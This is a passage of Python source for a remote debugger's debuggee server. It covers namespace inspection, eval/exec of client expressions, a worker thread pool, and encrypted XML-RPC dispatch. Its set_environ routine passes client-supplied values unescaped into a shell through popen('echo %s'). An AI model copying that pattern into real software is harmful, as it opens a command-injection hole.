line += '""")' + ls[1].split(')', 1)[1]
else:
line += '\n'
fhide_pwd_mode = True
lines.append(line)
try:
bp = self.m_bp_manager.get_breakpoint(frame_filename, _lineno)
breakpoints[_lineno] = as_unicode([STATE_DISABLED, STATE_ENABLED][bp.isEnabled()])
except KeyError:
pass
_lineno += 1
nlines -= 1
r = {}
r[DICT_KEY_FRAME_LINENO] = frame_lineno
r[DICT_KEY_EVENT] = as_unicode(frame_event)
r[DICT_KEY_BROKEN] = ctx.m_fBroken
r[DICT_KEY_TID] = tid
r[DICT_KEY_LINES] = lines
r[DICT_KEY_FILENAME] = as_unicode(frame_filename, sys.getfilesystemencoding())
r[DICT_KEY_BREAKPOINTS] = breakpoints
r[DICT_KEY_FIRST_LINENO] = first_line
return r
def get_source_lines(self, nlines, fAll, frame_index, fException):
if fException and fAll:
raise BadArgument
if fAll:
ctx_list = list(self.get_threads().values())
else:
ctx = self.get_current_ctx()
ctx_list = [ctx]
_sl = [self.__get_source(ctx, nlines, frame_index, fException) for ctx in ctx_list]
sl = [s for s in _sl if s is not None]
return sl
def __get_locals_globals(self, frame_index, fException, fReadOnly = False):
ctx = self.get_current_ctx()
(_globals, _locals, _original_locals_copy) = ctx.get_locals_copy(frame_index, fException, fReadOnly)
return (_globals, _locals, _original_locals_copy)
def __calc_number_of_subnodes(self, r):
for t in [bytearray, bytes, str, str8, unicode, int, long, float, bool, type(None)]:
if t is type(r):
return 0
try:
try:
if isinstance(r, frozenset) or isinstance(r, set):
return len(r)
except NameError:
pass
if isinstance(r, sets.BaseSet):
return len(r)
if isinstance(r, dict):
return len(r)
if isinstance(r, list):
return len(r)
if isinstance(r, tuple):
return len(r)
return len(dir(r))
except AttributeError:
return 0
return 0
def __calc_subnodes(self, expr, r, fForceNames, filter_level, repr_limit, encoding):
snl = []
try:
if isinstance(r, frozenset) or isinstance(r, set):
if len(r) > MAX_SORTABLE_LENGTH:
g = r
else:
g = [i for i in r]
sort(g)
for i in g:
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e = {}
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '"')))
e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)
snl.append(e)
return snl
except NameError:
pass
if isinstance(r, sets.BaseSet):
if len(r) > MAX_SORTABLE_LENGTH:
g = r
else:
g = [i for i in r]
sort(g)
for i in g:
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
rk = repr_ltd(i, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e = {}
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '"')))
e[DICT_KEY_NAME] = repr_ltd(i, repr_limit, encoding)
e[DICT_KEY_REPR] = repr_ltd(i, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(i)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(i)
snl.append(e)
return snl
if isinstance(r, list) or isinstance(r, tuple):
for i, v in enumerate(r[0: MAX_NAMESPACE_ITEMS]):
is_valid = [True]
e = {}
e[DICT_KEY_EXPR] = as_unicode('(%s)[%d]' % (expr, i))
e[DICT_KEY_NAME] = as_unicode(repr(i))
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
if len(r) > MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
return snl
if isinstance(r, dict):
if filter_level == 2 and expr in ['locals()', 'globals()']:
r = copy.copy(r)
for k, v in list(r.items()):
if parse_type(type(v)) in ['function', 'classobj', 'type']:
del r[k]
if len(r) > MAX_SORTABLE_LENGTH:
kl = r
else:
kl = list(r.keys())
sort(kl)
for k in kl:
#
# Remove any trace of session password from data structures that
# go over the network.
#
if k in ['_RPDB2_FindRepr', '_RPDB2_builtins', '_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
continue
v = r[k]
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
e = {}
if [True for t in [bool, int, float, bytes, str, unicode, type(None)] if t is type(k)]:
rk = repr(k)
if len(rk) < REPR_ID_LENGTH:
e[DICT_KEY_EXPR] = as_unicode('(%s)[%s]' % (expr, rk))
if type(k) is str8:
rk = repr(k)
if len(rk) < REPR_ID_LENGTH:
e[DICT_KEY_EXPR] = as_unicode('(%s)[str8(%s)]' % (expr, rk[1:]))
if not DICT_KEY_EXPR in e:
rk = repr_ltd(k, REPR_ID_LENGTH, encoding = ENCODING_RAW_I)
e[DICT_KEY_EXPR] = as_unicode('_RPDB2_FindRepr((%s), %d)["%s"]' % (expr, REPR_ID_LENGTH, rk.replace('"', '"')))
e[DICT_KEY_NAME] = as_unicode([repr_ltd(k, repr_limit, encoding), k][fForceNames])
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
return snl
al = calc_attribute_list(r, filter_level)
sort(al)
for a in al:
if a == 'm_rpdb2_pwd':
continue
try:
v = getattr(r, a)
except AttributeError:
continue
if len(snl) >= MAX_NAMESPACE_ITEMS:
snl.append(MAX_NAMESPACE_WARNING)
break
is_valid = [True]
e = {}
e[DICT_KEY_EXPR] = as_unicode('(%s).%s' % (expr, a))
e[DICT_KEY_NAME] = as_unicode(a)
e[DICT_KEY_REPR] = repr_ltd(v, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(v)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(v)
snl.append(e)
return snl
def get_exception(self, frame_index, fException):
ctx = self.get_current_ctx()
if is_py3k():
exc_info = ctx.get_exc_info()
if exc_info == None:
return {'type': None, 'value': None, 'traceback': None}
type, value, traceback = exc_info
e = {'type': type, 'value': value, 'traceback': traceback}
return e
try:
f = None
base_frame = None
base_frame = ctx.frame_acquire()
(f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
e = {'type': f.f_exc_type, 'value': f.f_exc_value, 'traceback': f.f_exc_traceback}
return e
finally:
f = None
base_frame = None
ctx.frame_release()
def is_child_of_failure(self, failed_expr_list, expr):
for failed_expr in failed_expr_list:
if expr.startswith(failed_expr):
return True
return False
def calc_expr(self, expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding):
e = {}
try:
__globals = _globals
__locals = _locals
if RPDB_EXEC_INFO in expr:
rpdb_exception_info = self.get_exception(frame_index, fException)
__globals = globals()
__locals = locals()
__locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr
is_valid = [True]
r = eval(expr, __globals, __locals)
e[DICT_KEY_EXPR] = as_unicode(expr)
e[DICT_KEY_REPR] = repr_ltd(r, repr_limit, encoding, is_valid)
e[DICT_KEY_IS_VALID] = is_valid[0]
e[DICT_KEY_TYPE] = as_unicode(parse_type(type(r)))
e[DICT_KEY_N_SUBNODES] = self.__calc_number_of_subnodes(r)
if fExpand and (e[DICT_KEY_N_SUBNODES] > 0):
fForceNames = (expr in ['globals()', 'locals()']) or (RPDB_EXEC_INFO in expr)
e[DICT_KEY_SUBNODES] = self.__calc_subnodes(expr, r, fForceNames, filter_level, repr_limit, encoding)
e[DICT_KEY_N_SUBNODES] = len(e[DICT_KEY_SUBNODES])
except:
print_debug_exception()
e[DICT_KEY_ERROR] = as_unicode(safe_repr(sys.exc_info()))
lock.acquire()
if len(rl) == index:
rl.append(e)
lock.release()
event.set()
def __calc_encoding(self, encoding, fvalidate = False, filename = None):
if encoding != ENCODING_AUTO and not fvalidate:
return encoding
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
return encoding
except:
pass
if filename == None:
ctx = self.get_current_ctx()
filename = ctx.m_code_context.m_filename
try:
encoding = get_file_encoding(filename)
return encoding
except:
return 'utf-8'
def get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
if fraw:
encoding = ENCODING_RAW_I
else:
encoding = self.__calc_encoding(encoding, fvalidate = True)
try:
(_globals, _locals, x) = self.__get_locals_globals(frame_index, fException, fReadOnly = True)
except:
print_debug_exception()
raise
failed_expr_list = []
rl = []
index = 0
lock = threading.Condition()
for (expr, fExpand) in nl:
if self.is_child_of_failure(failed_expr_list, expr):
continue
event = threading.Event()
args = (expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding)
if self.m_fsynchronicity:
g_server.m_work_queue.post_work_item(target = self.calc_expr, args = args, name = 'calc_expr %s' % expr)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 0, self.calc_expr, *args)
except:
pass
safe_wait(event, 2)
lock.acquire()
if len(rl) == index:
rl.append('error')
failed_expr_list.append(expr)
index += 1
lock.release()
if len(failed_expr_list) > 3:
break
_rl = [r for r in rl if r != 'error']
return _rl
def evaluate(self, expr, frame_index, fException, encoding, fraw):
"""
Evaluate expression in context of frame at depth 'frame-index'.
"""
result = [(as_unicode(''), as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]
if self.m_fsynchronicity:
self._evaluate(result, expr, frame_index, fException, encoding, fraw)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 1000, self._evaluate, result, expr, frame_index, fException, encoding, fraw)
except:
pass
return result[-1]
def _evaluate(self, result, expr, frame_index, fException, encoding, fraw):
"""
Evaluate expression in context of frame at depth 'frame-index'.
"""
encoding = self.__calc_encoding(encoding)
(_globals, _locals, x) = self.__get_locals_globals(frame_index, fException)
v = ''
w = ''
e = ''
try:
if '_rpdb2_pwd' in expr or '_rpdb2_args' in expr:
r = '...Removed-password-from-output...'
else:
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding, fstrict = True)
if '_RPDB2_builtins' in expr:
_locals['_RPDB2_builtins'] = vars(g_builtins_module)
try:
redirect_exc_info = True
r = eval(_expr, _globals, _locals)
finally:
del redirect_exc_info
if '_RPDB2_builtins' in expr:
del _locals['_RPDB2_builtins']
if fraw:
encoding = ENCODING_RAW_I
v = repr_ltd(r, MAX_EVALUATE_LENGTH, encoding)
if len(v) > MAX_EVALUATE_LENGTH:
v += '... *** %s ***' % STR_MAX_EVALUATE_LENGTH_WARNING
w = STR_MAX_EVALUATE_LENGTH_WARNING
except:
exc_info = sys.exc_info()
e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))
self.notify_namespace()
result.append((as_unicode(v), as_unicode(w), as_unicode(e)))
def execute(self, suite, frame_index, fException, encoding):
"""
Execute suite (Python statement) in context of frame at
depth 'frame-index'.
"""
result = [(as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]
if self.m_fsynchronicity:
self._execute(result, suite, frame_index, fException, encoding)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 1000, self._execute, result, suite, frame_index, fException, encoding)
except:
pass
return result[-1]
def _execute(self, result, suite, frame_index, fException, encoding):
"""
Execute suite (Python statement) in context of frame at
depth 'frame-index'.
"""
print_debug('exec called with: ' + repr(suite))
encoding = self.__calc_encoding(encoding)
(_globals, _locals, _original_locals_copy) = self.__get_locals_globals(frame_index, fException)
if frame_index > 0 and not _globals is _locals:
_locals_copy = copy.copy(_locals)
w = ''
e = ''
try:
if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
_locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr
try:
_suite = as_bytes(ENCODING_SOURCE % encoding + suite, encoding, fstrict = True)
#print_debug('suite is %s' % repr(_suite))
_code = compile(_suite, '<string>', 'exec')
try:
redirect_exc_info = True
exec(_code, _globals, _locals)
finally:
del redirect_exc_info
finally:
if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
del _locals['_RPDB2_FindRepr']
except:
exc_info = sys.exc_info()
e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))
if frame_index > 0 and (not _globals is _locals) and _locals != _locals_copy:
l = [(k, safe_repr(v)) for k, v in _locals.items()]
sl = set(l)
lc = [(k, safe_repr(v)) for k, v in _locals_copy.items()]
slc = set(lc)
nsc = [k for (k, v) in sl - slc if k in _original_locals_copy]
if len(nsc) != 0:
w = STR_LOCAL_NAMESPACE_WARNING
self.notify_namespace()
result.append((as_unicode(w), as_unicode(e)))
def __decode_thread_name(self, name):
name = as_unicode(name)
return name
def get_thread_list(self):
"""
Return thread list with tid, state, and last event of each thread.
"""
ctx = self.get_current_ctx()
if ctx is None:
current_thread_id = -1
else:
current_thread_id = ctx.m_thread_id
ctx_list = list(self.get_threads().values())
tl = []
for c in ctx_list:
d = {}
d[DICT_KEY_TID] = c.m_thread_id
d[DICT_KEY_NAME] = self.__decode_thread_name(c.m_thread_name)
d[DICT_KEY_BROKEN] = c.m_fBroken
d[DICT_KEY_EVENT] = as_unicode(c.m_event)
tl.append(d)
return (current_thread_id, tl)
def stop_debuggee(self):
"""
Notify the client and terminate this proccess.
"""
g_server.m_work_queue.post_work_item(target = _atexit, args = (True, ), name = '_atexit')
def set_synchronicity(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
event = CEventSynchronicity(fsynchronicity)
self.m_event_dispatcher.fire_event(event)
if self.m_state_manager.get_state() == STATE_BROKEN:
self.notify_namespace()
def set_trap_unhandled_exceptions(self, ftrap):
self.m_ftrap = ftrap
event = CEventTrap(ftrap)
self.m_event_dispatcher.fire_event(event)
def is_unhandled_exception(self):
return self.m_fUnhandledException
def set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
event = CEventForkMode(ffork_into_child, ffork_auto)
self.m_event_dispatcher.fire_event(event)
def set_environ(self, envmap):
global g_fignorefork
print_debug('Entered set_environ() with envmap = %s' % repr(envmap))
if len(envmap) == 0:
return
old_pythonpath = os.environ.get('PYTHONPATH', '')
encoding = detect_locale()
for k, v in envmap:
try:
k = as_string(k, encoding, fstrict = True)
v = as_string(v, encoding, fstrict = True)
except:
continue
command = 'echo %s' % v
try:
g_fignorefork = True
f = platform.popen(command)
finally:
g_fignorefork = False
value = f.read()
f.close()
if value[-1:] == '\n':
value = value[:-1]
os.environ[k] = value
if 'PYTHONPATH' in [k for (k, v) in envmap]:
recalc_sys_path(old_pythonpath)
#
# ------------------------------------- RPC Server --------------------------------------------
#
class CWorkQueue:
"""
Worker threads pool mechanism for RPC server.
"""
def __init__(self, size = N_WORK_QUEUE_THREADS):
self.m_lock = threading.Condition()
self.m_work_items = []
self.m_f_shutdown = False
self.m_size = size
self.m_n_threads = 0
self.m_n_available = 0
self.__create_thread()
def __create_thread(self):
t = CThread(name = '__worker_target', target = self.__worker_target, shutdown = self.shutdown)
#thread_set_daemon(t, True)
t.start()
def shutdown(self):
"""
Signal worker threads to exit, and wait until they do.
"""
if self.m_f_shutdown:
return
print_debug('Shutting down worker queue...')
self.m_lock.acquire()
self.m_f_shutdown = True
lock_notify_all(self.m_lock)
t0 = time.time()
while self.m_n_threads > 0:
if time.time() - t0 > SHUTDOWN_TIMEOUT:
self.m_lock.release()
print_debug('Shut down of worker queue has TIMED OUT!')
return
safe_wait(self.m_lock, 0.1)
self.m_lock.release()
print_debug('Shutting down worker queue, done.')
def __worker_target(self):
try:
self.m_lock.acquire()
self.m_n_threads += 1
self.m_n_available += 1
fcreate_thread = not self.m_f_shutdown and self.m_n_threads < self.m_size
self.m_lock.release()
if fcreate_thread:
self.__create_thread()
self.m_lock.acquire()
while not self.m_f_shutdown:
safe_wait(self.m_lock)
if self.m_f_shutdown:
break
if len(self.m_work_items) == 0:
continue
fcreate_thread = self.m_n_available == 1
(target, args, name) = self.m_work_items.pop()
self.m_n_available -= 1
self.m_lock.release()
if fcreate_thread:
print_debug('Creating an extra worker thread.')
self.__create_thread()
thread_set_name(current_thread(), '__worker_target - ' + name)
try:
target(*args)
except:
print_debug_exception()
thread_set_name(current_thread(), '__worker_target')
self.m_lock.acquire()
self.m_n_available += 1
if self.m_n_available > self.m_size:
break
self.m_n_threads -= 1
self.m_n_available -= 1
lock_notify_all(self.m_lock)
finally:
self.m_lock.release()
def post_work_item(self, target, args, name = ''):
if self.m_f_shutdown:
return
try:
self.m_lock.acquire()
if self.m_f_shutdown:
return
self.m_work_items.append((target, args, name))
self.m_lock.notify()
finally:
self.m_lock.release()
#
# MOD
#
class CUnTracedThreadingMixIn(SocketServer.ThreadingMixIn):
"""
Modification of SocketServer.ThreadingMixIn that uses a worker thread
queue instead of spawning threads to process requests.
This mod was needed to resolve deadlocks that were generated in some
circumstances.
"""
def process_request(self, request, client_address):
g_server.m_work_queue.post_work_item(target = SocketServer.ThreadingMixIn.process_request_thread, args = (self, request, client_address), name = 'process_request')
#
# MOD
#
def my_xmlrpclib_loads(data):
"""
Modification of Python 2.3 xmlrpclib.loads() that does not do an
import. Needed to prevent deadlocks.
"""
p, u = xmlrpclib.getparser()
p.feed(data)
p.close()
return u.close(), u.getmethodname()
#
# MOD
#
class CXMLRPCServer(CUnTracedThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer):
if os.name == POSIX:
allow_reuse_address = True
else:
allow_reuse_address = False
"""
Modification of Python 2.3 SimpleXMLRPCServer.SimpleXMLRPCDispatcher
that uses my_xmlrpclib_loads(). Needed to prevent deadlocks.
"""
def __marshaled_dispatch(self, data, dispatch_method = None):
params, method = my_xmlrpclib_loads(data)
# generate response
try:
if dispatch_method is not None:
response = dispatch_method(method, params)
else:
response = self._dispatch(method, params)
# wrap response in a singleton tuple
response = (response,)
response = xmlrpclib.dumps(response, methodresponse=1)
except xmlrpclib.Fault:
fault = sys.exc_info()[1]
response = xmlrpclib.dumps(fault)
except:
# report exception back to server
response = xmlrpclib.dumps(
xmlrpclib.Fault(1, "%s:%s" % (sys.exc_type, sys.exc_value))
)
print_debug_exception()
return response
if sys.version_info[:2] <= (2, 3):
_marshaled_dispatch = __marshaled_dispatch
#def server_activate(self):
# self.socket.listen(1)
def handle_error(self, request, client_address):
print_debug("handle_error() in pid %d" % _getpid())
if g_ignore_broken_pipe + 5 > time.time():
return
return SimpleXMLRPCServer.SimpleXMLRPCServer.handle_error(self, request, client_address)
class CPwdServerProxy:
"""
Encrypted proxy to the debuggee.
Works by wrapping a xmlrpclib.ServerProxy object.
"""
def __init__(self, crypto, uri, transport = None, target_rid = 0):
self.m_crypto = crypto
self.m_proxy = xmlrpclib.ServerProxy(uri, transport)
self.m_fEncryption = is_encryption_supported()
self.m_target_rid = target_rid
self.m_method = getattr(self.m_proxy, DISPACHER_METHOD)
def __set_encryption(self, fEncryption):
self.m_fEncryption = fEncryption
def get_encryption(self):
return self.m_fEncryption
def __request(self, name, params):
"""
Call debuggee method 'name' with parameters 'params'.
"""
while True:
try:
#
# Encrypt method and params.
#
fencrypt = self.get_encryption()
args = (as_unicode(name), params, self.m_target_rid)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
rpdb_version = as_unicode(get_interface_compatibility_version())
r = self.m_method(rpdb_version, fencrypt, fcompress, digest, msg)
(fencrypt, fcompress, digest, msg) = r
#
# Decrypt response.
#
((max_index, _r, _e), id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg, fVerifyIndex = False)
if _e is not None:
raise _e
except AuthenticationBadIndex:
e = sys.exc_info()[1]
self.m_crypto.set_index(e.m_max_index, e.m_anchor)
continue
except xmlrpclib.Fault:
fault = sys.exc_info()[1]
if class_name(BadVersion) in fault.faultString:
s = fault.faultString.split("'")
version = ['', s[1]][len(s) > 0]
raise BadVersion(version)
if class_name(EncryptionExpected) in fault.faultString:
raise EncryptionExpected
elif class_name(EncryptionNotSupported) in fault.faultString:
if self.m_crypto.m_fAllowUnencrypted:
self.__set_encryption(False)
continue
raise EncryptionNotSupported
elif class_name(DecryptionFailure) in fault.faultString:
raise DecryptionFailure
elif class_name(AuthenticationBadData) in fault.faultString:
raise AuthenticationBadData
elif class_name(AuthenticationFailure) in fault.faultString:
raise AuthenticationFailure
else:
print_debug_exception()
assert False
except xmlrpclib.ProtocolError:
print_debug("Caught ProtocolError for %s" % name)
#print_debug_exception()
raise CConnectionException
return _r
def __getattr__(self, name):
return xmlrpclib._Method(self.__request, name)
class CIOServer:
"""
Base class for debuggee server.
"""
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
self.m_thread = None
self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
self.m_fAllowRemote = fAllowRemote
self.m_rid = rid
self.m_port = None
self.m_stop = False
self.m_server = None
self.m_work_queue = None
def shutdown(self):
self.stop()
def start(self):
self.m_thread = CThread(name = 'ioserver', target = self.run, shutdown = self.shutdown)
thread_set_daemon(self.m_thread, True)
self.m_thread.start()
def jumpstart(self):
self.m_stop = False
self.start()
def stop(self):
if self.m_stop:
return
print_debug('Stopping IO server... (pid = %d)' % _getpid())
self.m_stop = True
while thread_is_alive(self.m_thread):
try:
proxy = CPwdServerProxy(self.m_crypto, calcURL(LOOPBACK, self.m_port), CLocalTimeoutTransport())
proxy.null()
except (socket.error, CException):
pass
self.m_thread.join(0.5)
self.m_thread = None
self.m_work_queue.shutdown()
#try:
# self.m_server.socket.close()
#except:
# pass
print_debug('Stopping IO server, done.')
def export_null(self):
return 0
def run(self):
if self.m_server == None:
(self.m_port, self.m_server) = self.__StartXMLRPCServer()
self.m_work_queue = CWorkQueue()
self.m_server.register_function(self.dispatcher_method)
while not self.m_stop:
self.m_server.handle_request()
def dispatcher_method(self, rpdb_version, fencrypt, fcompress, digest, msg):
"""
Process RPC call.
"""
#print_debug('dispatcher_method() called with: %s, %s, %s, %s' % (rpdb_version, fencrypt, digest, msg[:100]))
if rpdb_version != as_unicode(get_interface_compatibility_version()):
raise BadVersion(as_unicode(get_version()))
try:
try:
#
# Decrypt parameters.
#
((name, __params, target_rid), client_id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg)
except AuthenticationBadIndex:
e = sys.exc_info()[1]
#print_debug_exception()
#
# Notify the caller on the expected index.
#
max_index = self.m_crypto.get_max_index()
args = (max_index, None, e)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
return (fencrypt, fcompress, digest, msg)
r = None
e = None
try:
#
# We are forcing the 'export_' prefix on methods that are
# callable through XML-RPC to prevent potential security
# problems
#
func = getattr(self, 'export_' + name)
except AttributeError:
raise Exception('method "%s" is not supported' % ('export_' + name))
try:
if (target_rid != 0) and (target_rid != self.m_rid):
raise NotAttached
#
# Record that client id is still attached.
#
self.record_client_heartbeat(client_id, name, __params)
r = func(*__params)
except Exception:
_e = sys.exc_info()[1]
print_debug_exception()
e = _e
#
# Send the encrypted result.
#
max_index = self.m_crypto.get_max_index()
args = (max_index, r, e)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
return (fencrypt, fcompress, digest, msg)
except:
print_debug_exception()
raise
def __StartXMLRPCServer(self):
"""
As the name says, start the XML RPC server.
Looks for an available tcp port to listen on.
"""
host = [LOOPBACK, ""][self.m_fAllowRemote]
port = SERVER_PORT_RANGE_START
while True:
try:
server = CXMLRPCServer((host, port), logRequests = 0)
return (port, server)
except socket.error:
e = sys.exc_info()[1]
if GetSocketError(e) != errno.EADDRINUSE:
raise
if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
raise
port += 1
continue
def record_client_heartbeat(self, id, name, params):
pass
class CServerInfo(object):
def __init__(self, age, port, pid, filename, rid, state, fembedded):
assert(is_unicode(rid))
self.m_age = age
self.m_port = port
self.m_pid = pid
self.m_filename = as_unicode(filename, sys.getfilesystemencoding())
self.m_module_name = as_unicode(CalcModuleName(filename), sys.getfilesystemencoding())
self.m_rid = rid
self.m_state = as_unicode(state)
self.m_fembedded = fembedded
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def __str__(self):
return 'age: %d, port: %d, pid: %d, filename: %s, rid: %s' % (self.m_age, self.m_port, self.m_pid, self.m_filename, self.m_rid)
class CDebuggeeServer(CIOServer):
"""
The debuggee XML RPC server class.
"""
def __init__(self, filename, debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid = None):
if rid is None:
rid = generate_rid()
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
CIOServer.__init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
self.m_filename = filename
self.m_pid = _getpid()
self.m_time = time.time()
self.m_debugger = debugger
self.m_rid = rid
def shutdown(self):
CIOServer.shutdown(self)
def record_client_heartbeat(self, id, name, params):
finit = (name == 'request_break')
fdetach = (name == 'request_go' and True in params)
self.m_debugger.record_client_heartbeat(id, finit, fdetach)
def export_null(self):
return self.m_debugger.send_event_null()
def export_server_info(self):
age = time.time() - self.m_time
state = self.m_debugger.get_state()
fembedded = self.m_debugger.is_embedded()
si = CServerInfo(age, self.m_port, self.m_pid, self.m_filename, self.m_rid, state, fembedded)
return si
def export_sync_with_events(self, fException, fSendUnhandled):
ei = self.m_debugger.sync_with_events(fException, fSendUnhandled)
return ei
def export_wait_for_event(self, timeout, event_index):
(new_event_index, s) = self.m_debugger.wait_for_event(timeout, event_index)
return (new_event_index, s)
def export_set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
self.m_debugger.set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding)
return 0
def export_disable_breakpoint(self, id_list, fAll):
self.m_debugger.disable_breakpoint(id_list, fAll)
return 0
def export_enable_breakpoint(self, id_list, fAll):
self.m_debugger.enable_breakpoint(id_list, fAll)
return 0
def export_delete_breakpoint(self, id_list, fAll):
self.m_debugger.delete_breakpoint(id_list, fAll)
return 0
def export_get_breakpoints(self):
bpl = self.m_debugger.get_breakpoints()
return bpl
def export_request_break(self):
self.m_debugger.request_break()
return 0
def export_request_go(self, fdetach = False):
self.m_debugger.request_go()
return 0
def export_request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
self.m_debugger.request_go_breakpoint(filename, scope, lineno, frame_index, fException)
return 0
def export_request_step(self):
self.m_debugger.request_step()
return 0
def export_request_next(self):
self.m_debugger.request_next()
return 0
def export_request_return(self):
self.m_debugger.request_return()
return 0
def export_request_jump(self, lineno):
self.m_debugger.request_jump(lineno)
return 0
def export_get_stack(self, tid_list, fAll, fException):
r = self.m_debugger.get_stack(tid_list, fAll, fException)
return r
def export_get_source_file(self, filename, lineno, nlines, frame_index, fException):
r = self.m_debugger.get_source_file(filename, lineno, nlines, frame_index, fException)
return r
def export_get_source_lines(self, nlines, fAll, frame_index, fException):
r = self.m_debugger.get_source_lines(nlines, fAll, frame_index, fException)
return r
def export_get_thread_list(self):
r = self.m_debugger.get_thread_list()
return r
def export_set_thread(self, tid):
self.m_debugger.set_thread(tid)
return 0
def export_get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
r = self.m_debugger.get_namespace(nl, filter_level, frame_index, fException, repr_limit, encoding, fraw)
return r
def export_evaluate(self, expr, frame_index, fException, encoding, fraw):
(v, w, e) = self.m_debugger.evaluate(expr, frame_index, fException, encoding, fraw)
return (v, w, e)
def export_execute(self, suite, frame_index, fException, encoding):
(w, e) = self.m_debugger.execute(suite, frame_index, fException, encoding)
return (w, e)
def export_stop_debuggee(self):
self.m_debugger.stop_debuggee()
return 0
def export_set_synchronicity(self, fsynchronicity):
self.m_debugger.set_synchronicity(fsynchronicity)
return 0
def export_set_trap_unhandled_exceptions(self, ftrap):
self.m_debugger.set_trap_unhandled_exceptions(ftrap)
return 0
def export_is_unhandled_exception(self):
return self.m_debugger.is_unhandled_exception()
def export_set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_debugger.set_fork_mode(ffork_into_child, ffork_auto)
return 0
def export_set_environ(self, envmap):
self.m_debugger.set_environ(envmap)
return 0
def export_embedded_sync(self):
self.m_debugger.embedded_sync()
return 0
#
# ------------------------------------- RPC Client --------------------------------------------
#
#
# MOD
#
class CTimeoutHTTPConnection(httplib.HTTPConnection):
"""
Modification of httplib.HTTPConnection with timeout for sockets.
"""
_rpdb2_timeout = PING_TIMEOUT
def connect(self):
"""Connect to the host and port specified in __init__."""
# New Python version of connect().
if hasattr(self, 'timeout'):
self.timeout = self._rpdb2_timeout
return httplib.HTTPConnection.connect(self)
# Old Python version of connect().
msg = "getaddrinfo returns an empty list"
for res in socket.getaddrinfo(self.host, self.port, 0,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
